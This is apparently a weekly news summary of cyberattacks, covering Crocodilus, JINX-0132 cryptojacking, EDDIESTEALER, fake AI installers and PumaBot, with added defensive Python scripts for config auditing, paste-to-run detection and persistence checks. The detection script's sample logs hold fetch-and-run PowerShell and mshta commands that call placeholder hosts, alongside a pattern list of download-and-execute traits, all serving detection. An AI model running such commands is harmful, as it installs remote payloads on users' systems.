Weekly Summary of Cyberattacks, May 29 - June 4
Crocodilus, the new banking malware spreading across Europe and America
The Android banking Trojan known as Crocodilus has evolved rapidly since its discovery in March 2025. Initially limited to test campaigns in Turkey, it has since been detected in several European countries, including Spain and Poland, and in South America, including Argentina and Brazil. The latest research shows that it targets almost all Spanish banks, indicating a campaign aimed specifically at that country. The malware uses malicious ads on social networks such as Facebook to lure users, posing as banking applications, casinos or browser updates. Among its new features, Crocodilus can add fake contacts to the infected device (such as a supposed “Bank Support” entry) to facilitate social engineering fraud. It also incorporates technical improvements to avoid detection, such as advanced encryption and code obfuscation. One of its most dangerous functions is the automated collection of seed phrases from cryptocurrency wallets, which lets attackers take control of victims' digital assets.
Massive cryptojacking campaign exploits misconfigured DevOps tools
Cybersecurity researchers have detected a global cryptojacking campaign targeting DevOps applications such as Nomad, Consul, Docker and Gitea. The group responsible, tracked as JINX-0132, takes advantage of insecure configurations to deploy cryptocurrency mining software without any custom malware or attacker-owned servers, relying instead on public releases of the XMRig miner and public GitHub repositories. The campaign is notable for this “living off open source” approach, which makes it hard to detect and attribute. In the case of Nomad, this is the first time its exploitation has been documented in real attacks. JINX-0132 abuses APIs that are exposed without authentication and allow remote code execution, affecting even high-performance servers. According to the researchers, 25% of cloud environments use these tools, and 30% of those exposed to the Internet have configuration flaws. Following the security guidance published by each tool's developers is the recommended way to avoid falling victim to this type of attack.
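The root cause described above is configuration, not malware, so the useful check is a configuration audit. The following is an added example, not code from the original summary or from the researchers, that flags the unauthenticated-API exposures on Docker, Consul and Nomad agents (Gitea is omitted); the sample configs are constructed, and the checks only cover the keys named in the code.

```python
"""Audit JSON-formatted DevOps agent configs for unauthenticated API exposure."""
import json

def audit_docker(daemon: dict) -> list:
    """daemon.json: a TCP API listener without client-certificate verification
    lets anyone reaching the port start containers, i.e. run code on the host."""
    findings = []
    for host in daemon.get("hosts", []):
        if host.startswith("tcp://") and not daemon.get("tlsverify", False):
            findings.append(f"docker: API listener {host} without tlsverify")
    return findings

def audit_consul(cfg: dict) -> list:
    """Consul: with the ACL system off (the default) the HTTP API accepts any
    request; with it on, the default policy must also be deny."""
    acl = cfg.get("acl", {})
    if not acl.get("enabled", False):
        return ["consul: ACL system disabled"]
    if acl.get("default_policy", "allow") != "deny":
        return ["consul: ACL default_policy is not deny"]
    return []

def audit_nomad(cfg: dict) -> list:
    """Nomad: with ACLs off, anyone reaching the HTTP API can submit jobs,
    which is how a miner gets scheduled onto the cluster."""
    if not cfg.get("acl", {}).get("enabled", False):
        return ["nomad: ACL system disabled"]
    return []

def audit_all(docker_json: str, consul_json: str, nomad_json: str) -> list:
    """Run every check over JSON config text and return all findings."""
    return (audit_docker(json.loads(docker_json))
            + audit_consul(json.loads(consul_json))
            + audit_nomad(json.loads(nomad_json)))

# Constructed sample configs: the exposed setup beside its hardened counterpart.
WEAK_DOCKER = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
WEAK_CONSUL = '{"client_addr": "0.0.0.0"}'
WEAK_NOMAD = '{"bind_addr": "0.0.0.0"}'
SAFE_DOCKER = ('{"hosts": ["tcp://0.0.0.0:2376"], "tlsverify": true, '
               '"tlscacert": "/etc/docker/ca.pem"}')
SAFE_CONSUL = '{"acl": {"enabled": true, "default_policy": "deny"}}'
SAFE_NOMAD = '{"acl": {"enabled": true}}'

if __name__ == "__main__":
    for finding in audit_all(WEAK_DOCKER, WEAK_CONSUL, WEAK_NOMAD):
        print("FINDING:", finding)
    print("hardened:", audit_all(SAFE_DOCKER, SAFE_CONSUL, SAFE_NOMAD) or "no findings")
```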
New malware discovered that steals data through fake CAPTCHA pages
Cybersecurity researchers have identified a new malware family called EDDIESTEALER, an infostealer written in Rust that spreads through fake CAPTCHA campaigns. Users are lured to pages that imitate an “I'm not a robot” check; these pages copy a malicious command to the clipboard so that, once pasted and run, it executes PowerShell code that downloads the malware. EDDIESTEALER steals credentials, browser data and cryptocurrency wallets, among other things, mainly on Windows systems. The malware stands out for its technical sophistication: it encrypts strings with XOR, hides its Windows API calls, deletes itself using alternate NTFS data streams, and uses advanced techniques to evade scanning environments. It also collects system information and transmits it to a command and control (C2) server, adapting its behavior to the victim's environment. Recent variants have been found with extended capabilities, such as stealing browser passwords through WebSocket and DevTools. The use of Rust complicates analysis and reflects a growing trend in modern malware development.
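The delivery chain above leaves a recognizable trace in process-creation telemetry: a script interpreter spawned by explorer.exe (the parent when a user pastes into the Run box or the File Explorer address bar) with a hidden-window, encoded or fetch-and-run command line. The rule below is an added example, not code from the original summary or from the researchers; the JSON-lines field names and the sample events are constructed, and the example domains are placeholders.

```python
"""Flag paste-to-run (fake CAPTCHA) launches in process-creation records."""
import json
import re

# Interpreters a pasted "verification" command lands in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}
# Traits of a paste-to-run lure: hidden window, encoded or in-memory execution,
# or a fetch of remote content. Matched case-insensitively on the command line.
LURE_TRAITS = re.compile(
    r"-(?:w|win|windowstyle)\s+hidden|-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}"
    r"|invoke-expression|\biex\b|invoke-webrequest|\biwr\b|downloadstring|https?://",
    re.IGNORECASE)

def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def is_clickfix(event: dict) -> bool:
    """True when the event is explorer.exe -> interpreter with a lure-style command line."""
    if basename(event.get("parent", "")) != "explorer.exe":
        return False
    if basename(event.get("image", "")) not in INTERPRETERS:
        return False
    return LURE_TRAITS.search(event.get("cmdline", "")) is not None

def scan_jsonl(text: str) -> list:
    """Run the rule over JSON-lines records and return the matching command lines."""
    hits = []
    for line in text.splitlines():
        if line.strip():
            event = json.loads(line)
            if is_clickfix(event):
                hits.append(event["cmdline"])
    return hits

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample telemetry (field names are an assumption, not a real product's).
SAMPLE_LOG = "\n".join(json.dumps(e) for e in [
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": 'powershell -w hidden -c "iwr http://verify.example/x | iex"'},
    {"parent": r"C:\Windows\explorer.exe", "image": PS,
     "cmdline": "powershell.exe"},  # an admin opening a console: not flagged
    {"parent": r"C:\Windows\System32\svchost.exe", "image": PS,
     "cmdline": "powershell -enc QQBCAEMARABFAEYARwBIAEkASgBLAEwA"},  # other parent
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://verify.example/check.hta"},
])

if __name__ == "__main__":
    for hit in scan_jsonl(SAMPLE_LOG):
        print("ALERT paste-to-run:", hit)
```

The rule deliberately ignores interpreters launched by other parents (services, scheduled tasks), which belong to separate detections; tune INTERPRETERS and LURE_TRAITS to the lures seen in your own environment.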
Malware hidden in fake AI tools installers
Cybersecurity researchers have detected a new wave of threats posing as installers for artificial intelligence (AI) tools. These include the CyberLock and Lucky_Gh0$t ransomware families, as well as a newly identified destructive malware called Numero. The threats disguise themselves as legitimate AI applications, exploiting the popularity of these technologies in sectors such as sales, technology and marketing. CyberLock, written in PowerShell, encrypts files and demands a ransom in Monero, falsely claiming that the money will go to humanitarian aid. Lucky_Gh0$t, a variant of the Yashma ransomware, is distributed as a purported ChatGPT installer, while Numero, after masquerading as an AI video creation tool, renders systems unusable by manipulating the Windows GUI. The attackers distribute these files through deceptive search engine optimization (SEO poisoning), social networks and platforms such as Telegram. Organizations that download these fake tools risk compromising sensitive data, which underscores the need to verify sources carefully and to obtain software only from trusted vendors.
PumaBot, a botnet attacking IoT surveillance devices, discovered
Cybersecurity researchers have identified a new botnet called PumaBot, written in Go and designed to attack Linux-based IoT devices, especially surveillance cameras. Unlike many other threats, PumaBot does not perform mass scans; instead it receives specific targets from a command and control (C2) server and gains access by brute-forcing SSH credentials. Once inside, it executes remote commands, masquerades as a legitimate system file and creates persistent services to keep control of the device. It also inserts its own SSH keys for continued access and deploys additional tools such as “networkxm” and “ddaemon” to expand its capabilities and ensure its survival. It even replaces key system components such as PAM in order to intercept login credentials.
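Two of the persistence steps above, the inserted SSH key and the masquerading service, can be checked against a baseline on the device or from a pulled copy of its files. The script below is an added example, not code from the original summary or from the researchers: it reports authorized_keys entries whose SHA256 fingerprint is not on an approved list and systemd units whose ExecStart points outside the usual system directories. The key blobs, unit files and the tool name used in the sample are constructed.

```python
"""Baseline checks for PumaBot-style SSH key and service persistence."""
import base64
import binascii
import hashlib

# Where a legitimate service binary normally lives; a unit pointing elsewhere
# (e.g. /tmp, /var/tmp, /dev/shm, a hidden dir) deserves a look.
SYSTEM_EXEC_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/usr/libexec/",
                    "/usr/local/bin/", "/usr/local/sbin/", "/bin/", "/sbin/")
KEY_TYPES = ("ssh-", "ecdsa-", "sk-")

def key_fingerprint(line: str):
    """SHA256 fingerprint of one authorized_keys entry, as ssh-keygen -l prints it.
    Returns None for comments, blank lines or entries that do not parse."""
    tokens = line.split()
    for i, tok in enumerate(tokens[:-1]):      # key type is followed by the blob
        if tok.startswith(KEY_TYPES):          # options prefix, if any, is skipped
            try:
                blob = base64.b64decode(tokens[i + 1], validate=True)
            except (binascii.Error, ValueError):
                return None
            digest = hashlib.sha256(blob).digest()
            return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")
    return None

def unknown_keys(authorized_keys: str, approved: set) -> list:
    """Fingerprints present in authorized_keys but absent from the approved set."""
    found = []
    for line in authorized_keys.splitlines():
        if line.strip().startswith("#"):
            continue
        fp = key_fingerprint(line)
        if fp and fp not in approved:
            found.append(fp)
    return found

def suspicious_units(units: dict) -> list:
    """Names of systemd units whose ExecStart binary is outside SYSTEM_EXEC_DIRS."""
    flagged = []
    for name, text in units.items():
        for raw in text.splitlines():
            if raw.strip().startswith("ExecStart="):
                exe = raw.split("=", 1)[1].strip().lstrip("-@:+!").split()[0]
                if not exe.startswith(SYSTEM_EXEC_DIRS):
                    flagged.append(name)
                break
    return flagged

# Constructed samples: one approved admin key, one rogue key, two unit files.
ADMIN_KEY = "ssh-ed25519 " + base64.b64encode(b"constructed admin key").decode() + " admin@host"
ROGUE_KEY = "ssh-rsa " + base64.b64encode(b"constructed rogue key").decode() + " root@build"
SAMPLE_AUTHORIZED = "# managed by config management\n" + ADMIN_KEY + "\n" + ROGUE_KEY + "\n"
SAMPLE_UNITS = {
    "redis.service": "[Service]\nExecStart=/usr/bin/redis-server /etc/redis.conf\n",
    "networkxm.service": "[Service]\nExecStart=/tmp/.x/networkxm\nRestart=always\n",
}
```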